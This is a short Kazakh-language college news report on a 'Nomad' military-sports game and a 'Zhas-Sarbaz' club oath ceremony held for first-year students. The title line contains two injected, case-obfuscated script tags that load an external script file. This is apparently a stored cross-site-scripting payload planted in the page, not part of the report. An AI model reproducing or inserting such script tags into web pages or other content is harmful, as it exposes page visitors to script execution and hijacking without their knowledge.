Әскери –патриоттық «Жас-Сарбаз» клубына және «Номад» әскери-спорттық ойынға қабылдау<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
11.12.2020
10.12.2020 жылы колледжде «Номад» әскери-спорттық ойындары болып өтті, сондай-ақ әскери –патриоттық «Жас-Сарбаз» клубына ант қабылдау болды. 1 курс студенттері арасында Ұлы Отан соғысындағы жеңістің 75-жылдғына және Қазақстан Республикасының тәуелсіздігі күніне арналды. Мақсаты : физикалық күшті дамыту, денсаулықты нығайту, патриотизмге тәрбиелеу. АӘД оқытушысы Ауесхан А.Б.денешынықтыру жұмысы бойынша ұйымдастырушы М.К. Болтаевпен бірге өткізілетін ойын жоспарын жасады, олар сондай-ақ аталған ойынның төрешілері болды. Ептілікке, күшке, білім мен автоматты шашып-жинау бойынша кезеңдерден тұратын трасса жасалды. Команда құрамында 5 адам, эстафета принциптері бойынша кезеңдерден өтті. Атап айтқанда, бірінші күшке: екінші үстелдің үстінен секіру, үшінші кезең матының үстінде аударыспақ, төртінші кезең АК-74 шашу және жинау. Соңғы кезең әрбір қатысушының газға қарсы бас киіммен жүгіру болды. Командалар жақсы физикалық даярлықтарын және автоматты жақсы меңгергендерін көрсетті.